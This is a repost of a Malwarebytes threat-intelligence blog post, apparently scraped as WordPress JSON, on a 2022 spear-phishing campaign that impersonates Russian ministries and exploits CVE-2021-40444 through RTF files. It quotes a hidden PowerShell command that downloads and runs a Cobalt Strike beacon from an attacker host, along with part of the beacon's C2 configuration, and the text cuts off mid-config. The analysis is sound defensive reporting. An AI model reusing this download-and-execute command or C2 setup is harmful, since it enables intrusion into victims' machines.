{"id":18617,"date":"2022-03-29T10:10:07","date_gmt":"2022-03-29T18:10:07","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/03\/29\/news-12350\/"},"modified":"2022-03-29T10:10:07","modified_gmt":"2022-03-29T18:10:07","slug":"news-12350","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2022\/03\/29\/news-12350\/","title":{"rendered":"New spear phishing campaign targets Russian dissidents"},"content":{"rendered":"<p><strong>Credit to Author: Threat Intelligence Team| Date: Tue, 29 Mar 2022 18:02:48 +0000<\/strong><\/p>\n<p><em>This blog post was authored by Hossein Jazi.<\/em><\/p>\n<p>Several threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is activity monitoring these threats and has observed activities associated with the geopolitical conflict.<\/p>\n<p>More specifically, we&#8217;ve witnessed several APT actors such as <a href=\"https:\/\/twitter.com\/h2jazi\/status\/1501198521139175427\">Mustang Panda<\/a>, <a href=\"https:\/\/twitter.com\/h2jazi\/status\/1500607147989684224\">UNC1151<\/a> and <a href=\"https:\/\/twitter.com\/h2jazi\/status\/1505887653111209994\">SCARAB<\/a> that have used war-related themes to target mostly Ukraine. We&#8217;ve also observed several different <a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine\/\">wipers<\/a> and cybercrime groups such as <a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F\/\">FormBook<\/a> using the same tactics. Beside those known groups we saw an <a href=\"https:\/\/twitter.com\/h2jazi\/status\/1501941517409083397\">actor<\/a> that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. <\/p>\n<p>On March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.<\/p>\n<p>The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike or a Remote Administration Trojan (Rat).<\/p>\n<h2>Spear phishing  as the main initial infection vector<\/h2>\n<p>These emails pretend to be from the &#8220;Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation&#8221; and &#8220;Federal Service for Supervision of Communications, Information Technology and Mass Communications&#8221; of Russia.<\/p>\n<p>We have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/12\/21\/attackers-test-cab-less-40444-exploit-in-a-dry-run\/\">Sophos<\/a> has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.<\/p>\n<ul>\n<li><strong>Email with RTF file: <\/strong>\n<ul>\n<li><em>\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439<\/em> (Federal Service for Supervision of Communications, Information Technology and Mass Communications)<\/li>\n<li><em>\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438<\/em> (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2.png\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"55325\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/phish1-2-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2.png\" data-orig-size=\"1915,502\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phish1-2\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2-300x79.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2-600x157.png\" width=\"1915\" height=\"502\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2.png\" alt=\"\" class=\"wp-image-55325\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2.png 1915w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2-300x79.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2-600x157.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish1-2-1536x403.png 1536w\" sizes=\"auto, (max-width: 1915px) 100vw, 1915px\" \/><\/a><figcaption>Figure 1: Phishing template<\/figcaption><\/figure>\n<\/div>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2.png\" data-rel=\"lightbox-image-1\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55326\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/phish2-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2.png\" data-orig-size=\"1919,506\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phish2\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2-300x79.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2-600x158.png\" loading=\"lazy\" width=\"1919\" height=\"506\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2.png\" alt=\"\" class=\"wp-image-55326\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2.png 1919w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2-300x79.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2-600x158.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish2-1536x405.png 1536w\" sizes=\"auto, (max-width: 1919px) 100vw, 1919px\" \/><\/a><figcaption>Figure 2: Phishing template <\/figcaption><\/figure>\n<\/div>\n<ul>\n<li><strong>Email with archive file:<\/strong>\n<ul>\n<li><em>\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435<\/em>. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)<\/li>\n<li><em>\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438<\/em> (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4.png\" data-rel=\"lightbox-image-2\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55329\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/phish4-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4.png\" data-orig-size=\"1937,534\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phish4\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4-300x83.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4-600x165.png\" loading=\"lazy\" width=\"1937\" height=\"534\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4.png\" alt=\"\" class=\"wp-image-55329\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4.png 1937w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4-300x83.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4-600x165.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish4-1536x423.png 1536w\" sizes=\"auto, (max-width: 1937px) 100vw, 1937px\" \/><\/a><figcaption>Figure 3: Phishing template <\/figcaption><\/figure>\n<\/div>\n<ul>\n<li><strong>Email with link:<\/strong>\n<ul>\n<li><em>\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438<\/em> (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3.png\" data-rel=\"lightbox-image-3\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55330\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/phish3-2\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3.png\" data-orig-size=\"1925,524\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phish3\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3-300x82.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3-600x163.png\" loading=\"lazy\" width=\"1925\" height=\"524\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3.png\" alt=\"\" class=\"wp-image-55330\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3.png 1925w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3-300x82.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3-600x163.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/phish3-1536x418.png 1536w\" sizes=\"auto, (max-width: 1925px) 100vw, 1925px\" \/><\/a><figcaption>Figure 4: phishing template <\/figcaption><\/figure>\n<\/div>\n<h2>Victimology<\/h2>\n<p>The actor has sent its spear phishing emails to people that had email with these domains: <\/p>\n<p><em>mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net<\/em><\/p>\n<p>Based on these domains, here is the list of potential victims:<\/p>\n<ul>\n<li>Portal of authorities of the Chuvash Republic Official Internet portal<\/li>\n<li>Russian Ministry of Internal Affairs<\/li>\n<li>ministry of education and science of the republic of Altai <\/li>\n<li>Ministry of Education of the Stavropol Territory<\/li>\n<li>Minister of Education and Science of the Republic of North Ossetia-Alania<\/li>\n<li>Government of Astrakhan region <\/li>\n<li>Ministry of Education of the Irkutsk region <\/li>\n<li>Portal of the state and municipal service Moscow region <\/li>\n<li>Ministry of science and higher education of the Russian Federation<\/li>\n<\/ul>\n<h2>Analysis:<\/h2>\n<p>The lures used by the threat actor are in Russian language and pretend to be from Russia&#8217;s &#8220;Ministry of Information Technologies and Communications of the Russian Federation&#8221; and &#8220;MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS&#8221;.  One of them is a letter about limitation of access to Telegram application in Russia. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia.png\" data-rel=\"lightbox-image-4\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55293\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/russia\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia.png\" data-orig-size=\"610,846\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"russia\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia-216x300.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia-433x600.png\" loading=\"lazy\" width=\"610\" height=\"846\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia.png\" alt=\"\" class=\"wp-image-55293\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia.png 610w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia-216x300.png 216w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/russia-433x600.png 433w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/a><figcaption>Figure 5: Lure letter<\/figcaption><\/figure>\n<\/div>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock.png\" data-rel=\"lightbox-image-5\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55369\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/cveblock\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock.png\" data-orig-size=\"1119,647\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"cveblock\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock-300x173.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock-600x347.png\" loading=\"lazy\" width=\"1119\" height=\"647\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock.png\" alt=\"\" class=\"wp-image-55369\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock.png 1119w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock-300x173.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/cveblock-600x347.png 600w\" sizes=\"auto, (max-width: 1119px) 100vw, 1119px\" \/><\/a><figcaption>Figure 6: Lure template<\/figcaption><\/figure>\n<\/div>\n<p>These RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine.<br \/><code>http:\/\/wallpaper.skin\/office\/updates\/GtkjdsjkyLkjhsTYhdsd\/exploit.html<\/code> <\/p>\n<p>The html file contains a script that executes the script in WSF data embedded in the RTF file. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM.png\" data-rel=\"lightbox-image-6\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55296\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/screen-shot-2022-03-25-at-2-37-47-pm\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM.png\" data-orig-size=\"1855,286\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Screen-Shot-2022-03-25-at-2.37.47-PM\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM-300x46.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM-600x93.png\" loading=\"lazy\" width=\"1855\" height=\"286\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM.png\" alt=\"\" class=\"wp-image-55296\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM.png 1855w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM-300x46.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM-600x93.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-2.37.47-PM-1536x237.png 1536w\" sizes=\"auto, (max-width: 1855px) 100vw, 1855px\" \/><\/a><figcaption>Figure 7: html file<\/figcaption><\/figure>\n<\/div>\n<p>The actor has added WSF data (Windows Script Host) at the start of the RTF file.  As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM.png\" data-rel=\"lightbox-image-7\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55295\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/screen-shot-2022-03-25-at-1-43-00-pm\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM.png\" data-orig-size=\"647,357\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Screen-Shot-2022-03-25-at-1.43.00-PM\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM-300x166.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM-600x331.png\" loading=\"lazy\" width=\"647\" height=\"357\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM.png\" alt=\"\" class=\"wp-image-55295\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM.png 647w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM-300x166.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/Screen-Shot-2022-03-25-at-1.43.00-PM-600x331.png 600w\" sizes=\"auto, (max-width: 647px) 100vw, 647px\" \/><\/a><figcaption>Figure 8: WSF data<\/figcaption><\/figure>\n<\/div>\n<p>Executing this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim&#8217;s machine. (The deployed CobaltStrike file name is Putty) <\/p>\n<pre class=\"wp-block-code\"><code>\"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http:\/\/wallpaper.skin\/office\/updates\/GtkjdsjkyLkjhsTYhdsd\/putty.exe' -OutFile $env:TEMPputty.exe; . $env:TEMPputty.exe; Start-Sleep 15<\/code><\/pre>\n<p>The following shows the CobaltStrike config:<\/p>\n<pre class=\"wp-block-code\"><code>{   \"BeaconType\": &#091;     \"HTTPS\"   ],   \"Port\": 443,   \"SleepTime\": 38500,   \"MaxGetSize\": 1398151,   \"Jitter\": 27,   \"C2Server\": \"wikipedia-book.vote,\/async\/newtab_ogb\",   \"HttpPostUri\": \"\/gen_204\",   \"Malleable_C2_Instructions\": &#091;     \"Remove 17 bytes from the end\",     \"Remove 32 bytes from the beginning\",     \"Base64 URL-safe decode\"   ],   \"SpawnTo\": \"\/4jEZLD\/DHKDj1CbBvlJIg==\",   \"HttpGet_Verb\": \"GET\",   \"HttpPost_Verb\": \"POST\",   \"HttpPostChunk\": 96,   \"Spawnto_x86\": \"%windir%\\syswow64\\gpupdate.exe\",   \"Spawnto_x64\": \"%windir%\\sysnative\\gpupdate.exe\",   \"CryptoScheme\": 0,   \"Proxy_Behavior\": \"Use IE settings\",   \"Watermark\": 1432529977,   \"bStageCleanup\": \"True\",   \"bCFGCaution\": \"True\",   \"KillDate\": 0,   \"bProcInject_StartRWX\": \"True\",   \"bProcInject_UseRWX\": \"False\",   \"bProcInject_MinAllocSize\": 16700,   \"ProcInject_PrependAppend_x86\": &#091;     \"kJCQ\",     \"Empty\"   ],   \"ProcInject_PrependAppend_x64\": &#091;     \"kJCQ\",     \"Empty\"   ],   \"ProcInject_Execute\": &#091;     \"ntdll.dll:RtlUserThreadStart\",     \"SetThreadContext\",     \"NtQueueApcThread-s\",     \"kernel32.dll:LoadLibraryA\",     \"RtlCreateUserThread\"   ],   \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",   \"bUsesCookies\": \"True\",   \"HostHeader\": 